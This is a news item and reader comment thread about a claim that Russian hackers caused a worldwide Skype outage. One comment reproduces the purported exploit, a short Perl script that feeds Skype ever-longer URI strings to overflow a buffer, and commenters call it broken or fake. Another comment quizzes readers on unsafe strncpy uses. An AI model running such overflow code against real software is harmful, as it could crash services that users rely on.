Did Russian Hackers Crash Skype?

An anonymous reader sends us to the www.xakep.ru forum where a poster claims that the worldwide Skype crash was caused by Russian hackers (in Russian). The claim is that they found a local buffer overflow vulnerability caused by sending a long string to the Skype authorization server. You can try Google's beta Russian-to-English translation, but the interesting part is the exploit code, and that's more readable in the original. The Washington Post reports that Skype has denied this rumor.

Re:In Soviet Russia...

[r00b]

In America you crash when using the phone.

The code snippet seems to be wrong

[ghost4096]

The loop body will never execute....

Re:The code snippet seems to be wrong

[tftp]

It actually executes, I tried the loop just now.

Re:The code snippet seems to be wrong

[eggnoglatte]

Hex constants in Perl, like C/C++ have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.

Re:The code snippet seems to be wrong

[lgftsa]

It's the other way around. xCCCC is not a valid number in perl, so the loop will never exit.

Re:The code snippet seems to be wrong

[svallarian]

It's obviously a typo. Since it was Russian code, it was supposed to be xCCCP

Re:The code snippet seems to be wrong

[ThePhilips]

Well, this is very very very old Russian hacker tradition: introduce flaw in the crack/exploit to prevent it from being (ab)used by idiots.

Re:The code snippet seems to be wrong

[eneville]

Hex constants in Perl, like C/C++ have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.
no, octal numbers start with 0. hex numbers start with x. typo: no, octal numbers start with 0. hex numbers start with 0x.

Re:The code snippet seems to be wrong

[Daimanta]

It actually executes, I tried the loop just now.

Re:The code snippet seems to be wrong

[ultranova]

Well, this is very very very old Russian hacker tradition: introduce flaw in the crack/exploit to prevent it from being (ab)used by idiots.

In Soviet Russia idiots abuse you !

Look

[TheRealMindChild]

strncpy

Re:Look

[Traa]

You think that strncpy is safe??

The following code snippets assume pszSrc is smaller or equal to 50 chars

// Example #1

#define MAX (50)
char *pszDest = malloc(sizeof(pszSrc));
strncpy(pszDest,pszSrc,MA X);

// Example #2

#define MAX (50)
char szDest[MAX];
strncpy(szDest,pszSrc,MAX);

// Example #3

#define MAX (50)
char szDest[MAX];
strncpy(szDest,pszSrc,MAX);
pszDest [MAX] = '\0';

// Example #4

#define MAX (50)
char szDest[MAX];
strncpy(szDest,pszSrc,MAX-1);
strnc at(szDest,pszSrc,MAX-1);

// Example #5

char szDest[50];
_snprintf(szDest, strlen(szDest), "%s",szSrc);

Which of the above is safe?

Not a single one!

#1: sizeof(pszSrc) is 4 if pszSrc is a pointer, not a staticly-allocated array.
#2: szDest is left unterminated if strlen(pszSrc) equals MAX
#3: Writing "szDest[MAX]" overruns the array
#4: Misuse of the size parameter to strncat, it should be the space left, not the total space in the array.
#5: Author of that code doesn't understand strlen ;)

Sorry, you didn't get the job.

The above snippet was taken from here

Re:Look

[nevali]

If you use strncpy(), you make sure the string has a terminator if you're going to need one.

It's really that simple. Every specification which explains strncpy() says as much.

Using strncpy() as specified is infinitely safer than using a function which blindly copies characters forever irrespective of your buffer size.

Posting five examples of "the author doesn't understand C arrays or strncpy()" isn't an argument for strncpy() being horrifically unsafe, it's an argument that for every single programming construct, there are five programmers out there who are guaranteed to fuck them up.

The worst thing is, this is first-grade C programming. If you don't understand this stuff, you need to go back and learn how arrays and strings work.

Next week: why memcpy() on overlapping buffer regions can eat your cat!

Re:Look

[PhrostyMcByte]

It's very rare for it to be okay to not write a trailing 0 terminator, or need unused buffer space padded with 0's. and that's exactly what the 'n' functions can do - the number of coders who don't know this and choose to blindly assume the functions protect them is astounding.

Really, though. If you need the buffer space, you need the buffer space. Truncation is usually not an option. This is sloppy coding, but not due to lack of using 'n' functions. Resize as needed or reject the request if it gets too big.

Re:Look

[cortana]

s/inefficient BSD crap/functions that result in silent loss of data/

Translation

[ACS+Solver]

Here's the article's introductory part properly translated.

"The reason for yesterday's downtime of the Skype network is research of Russian crackers, as reported by one of our readers.

While searching for a local buffer overflow, a possibility was found to send a long string to the server, overflowing its buffer and causing the server to go down. Its place is taken by another server from the P2P network, the error arises on it in the same way, and so on. As a result, the entire Skype network refused service for several hours and the developer team was forced to turn off authentication.

Here's the exploit code:"

Re:Translation

[mobby_6kl]

You've got to be kidding, I was about to submit my own translation! :)

Anyway, your version is probably a little better, so I'll contribute with something else. The script is very short too, so here it is:

#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!
 
for ($i=256; $i>xCCCCC; $i=$i+256)
{
$eot='AAAA' x $i;
call_sp();
}
exit;
 
sub call_sp()
{
$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
system("$str");
}

The first page of comments seems to be just the usual bunch of trolls, assholes, and simply useless posts, except for one that claims the code has been shown not to do anything on a dedicated security site. The Skype article on the front page doesn't contain any additional information. The attack looks almost too simple to work, but I wasn't able to find any strong evidence that would suggest that it doesn't, at least not with a few quick searches.

Re:IN SOVIET RUSSIA

[Arthur+Grumbine]

And the long string was... "In Soviet Russia we are tired of all the mindless obligatory comments about the beloved Motherland."

They hired DoS specialists against their own users

[rpp3po]

Skype's login servers usually don't carry much load compared to the mass of traffic routed directly between all nodes via P2P. My guess is they just got overrun because they were not prepared for the worst case: ALL clients trying to connect AT THE SAME TIME to their master. I bet Slashdot wouldn't be prepared for all of its users connecting at the same time, either. But it needs not to. It is never going to happen (why should it? - well how about December 1st, 1AM UTC everybody?). With Skype it's different. They should have been prepared for the case, that whenever their network would be down for whatever reason all clients would try to connect concurrently! Obviously they weren't prepared. If you watched the aftermath closely you could see that they started filtering by IP on day two. Only a certain number of clients were allowed to connect per IP range. They probably hired super expensive DoS emergency contractors to get this back up. A hack is still possible, but I rather guess that it brought the network down, but did not keep it from coming back up. That was Skype's own fault.

fake?

[arghblubber]

http://www.ush.it/2007/08/18/why-the-skype-0day-ex ploit-is-a-fake/

It's OK folks!

[goldspider]

They were just expressing their frustration with the expanding influence of capitalism. In the future, we should try to react to protests like this with a little understanding.

coincidence?

[TheSHAD0W]

I bet people are trying exploits against Skype (and other popular servers and services) all the time. If someone tries something funny, and the system crashes a few seconds afterwards, they may assume they were the cause.

Another Soviet Russia comment

[kylehase]

In Soviet Russia we crash Skype. Wait... that doesn't seem right.

Skype has to change for eavesdropping law

[Burz]

It probably has more to do with Skype retooling for eavesdropping requirements under the new wiretap law. Skype handles a lot of international traffic, encrypted and often in a P2P fashion, so a major change is necessary in order to comply.

From what little I know about Skype, the network can cause both parties in a Skype-Skype call to route through a third party, a supernode (this is done to defeat firewall complications). So perhaps they would be able to start routing all USA-international traffic through in-house supernodes where the stream could be tapped. (Anyone want to correct me? Clarify?)

Re:Skype has to change for eavesdropping law

[ultranova]

What she doesn't seem to get is that the CIA isn't some kid hanging from her drainpipe and fiddling with alligator clips. When they listen in on your phone, you don't know about it.

Unless, of course, they want her to know about it, in order to encourage self-censorship.

Same with Skype. If they were to install CALEA compliance software, it would certainly not result in two days of downtime. There would be no outside sign that it had ever happened.

Again, you're assuming that secrecy is desired. It isn't. If you make people think they are being watched at all times (which is simply impossible - there's no way to process that much data in any useful manner), they will soon start avoiding all behavior which, while legal, might be potentially embarassing or suspicious if brought to light. You don't need to remove all privacy, you just need to make people think that they have no privacy in order to reap the benefits.

Never attribute to incompetence that which is adequately explained by malice.

What really happened !!!

It wouldn't surprise me to learn that Skype shut down their OWN servers at the request of
a "big Brother" agency, for the purpose of installing "Big Brother" software on both the
server(s) and eventually the clients (because now a trojan is installed) into everyone's
system with a "knock knock" protocol that would activate a "wiretap" to capture your
voice, images, and text. That's why we had to DL that "new copy" they wanted us to have.

Now I know you folks think I'm full if shit... I hope the heck I am but there is now
something the "skype hackers" can check out to see if it's really true. I suppose a really
good reverse engineering effort would find something like that.

Why would the Russkies want to mess up Skype, they use it more then anyone else.

Re:They hired DoS specialists against their own us

[Smauler]

I bet Slashdot wouldn't be prepared for all of its users connecting at the same time, either. But it needs not to. It is never going to happen (why should it?)

I believe you are discounting the possibility of the actuality of Natalie Portman and Hot Grits.

Re:Russians ? They don't have good education

[LanceUppercut]

LOL. "American school system". What is it, an oxymoron contest? :)

Just watch the Skype blogs...

[vistic]

The Skype blog had info being posted all during the outage, and will have a summary of what happened soon. They never indicated it was anything related to any outside intrusion.

Re:Just watch the Skype blogs...

[raju1kabir]

The Skype blog had info being posted all during the outage, and will have a summary of what happened soon. They never indicated it was anything related to any outside intrusion.

Then you know it's true; nobody's ever lied on a blog before.

Re:They hired DoS specialists against their own us

[FireFury03]

My guess is they just got overrun because they were not prepared for the worst case: ALL clients trying to connect AT THE SAME TIME to their master.

This is a pretty good example of why centralised network topologies such as Skype, MSN, etc. are a really Bad Idea. It doesn't take much to take down the entire network.

SIP, XMPP, SMTP, etc are all examples of distributed topologies - there is centralised service required(*) for these networks - if one service provider's network falls over it only affects a small number of users rather than taking out *all* the users using that protocol.

(* Yes, they all require the root name servers, but these days the root name server architecture is pretty resillient through the use of technologies such as anycase. Certainly a lot more resillient than any one organisation could hope to achieve for their own propriatory protocols).

They should have been prepared for the case, that whenever their network would be down for whatever reason all clients would try to connect concurrently!

This is not really a question of preparation - it's a question of a sensible network design. The Skype network (and most other propriatory services) is a flawed design _because_ they want to have control of every aspect of the network. Open protocols are generally designed to allow interoperation of independent autonomous networks so an outage of this magnetude is pretty much impossible.

Re:They hired DoS specialists against their own us

[FireFury03]

I use Skype a fair amount, and I find it rather flaky.

Why don't you switch to an open protocol which might not be so flakey?

If anyone has had good experiences with alternatives to Skype, that are multi-platform and support voice conferencing of 4-8 people, please let me know!

Set up a CallWeaver server. I use CallWeaver as my server and Ekiga as my softphone and it works fine (also a UTStarCom F1000G as a WiFi phone, but I have all sorts of problems with that owing to UTStarCom's flakey firmware which they won't fix). At my old job we found that SJPhone and X-Lite were reasonable alternatives to Ekiga for the Windows users (although there is a Windows version of Ekiga but my experience is that it's not entirely stable).

You can also use one of the many SIP/PSTN gateways, such as VoIPUser, to gateway calls in from the PSTN if not everyone is able to use VoIP.

Re:Skype and Patriot act maybe not hackers?

[RAMMS+EIN]

Man, you ever notice that return key on your keyboard? You should use it once in a while...